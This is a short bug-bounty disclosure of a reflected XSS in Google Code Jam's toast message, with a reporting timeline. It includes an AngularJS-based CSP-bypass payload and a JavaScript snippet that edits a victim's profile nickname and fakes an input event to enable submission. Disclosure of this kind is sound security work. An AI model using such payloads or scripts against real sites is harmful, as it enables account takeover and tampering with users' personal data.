Reflected XSS in Google Code Jam

Information about this XSS:

The XSS will be fired in the toast message.

Also, it seems like you have to open the homepage ( at least once before visiting other pages there.



Due to CSP, this XSS will fire only in browsers where CSP is not supported (e.g. IE).

If we could somehow find a way to execute a script that has inserted dynamically, we could bypass (thanks to the CSP using the following payload. But I don’t think it’s possible in this case.

<script src=""></script>
<div ng-app ng-csp id=p ng-click=$event.view.alert(1)>

Read more about bypassing CSP in my other post.

Attack scenario:

Attacker can get access to the victim’s CodeJam account and read and edit their profile information (address, phone number, etc.).

Here’s an example of how it could be done:

// go to profile page

setTimeout(function() {
  // change the username
  document.querySelector('#nickname').value = 'mynickname111';
  // create a fake input event to enable the submit button
  var event = document.createEvent("Event");
  event.initEvent('input', false, true); 
  // submit the form
}, 1000);

2018-08-29Vulnerability reported
2018-08-30Priority changed to P2
2018-08-30Nice catch
2018-09-05Reward issued

Written by Thomas Orlita
Follow me on Twitter: @ThomasOrlita / Mastodon: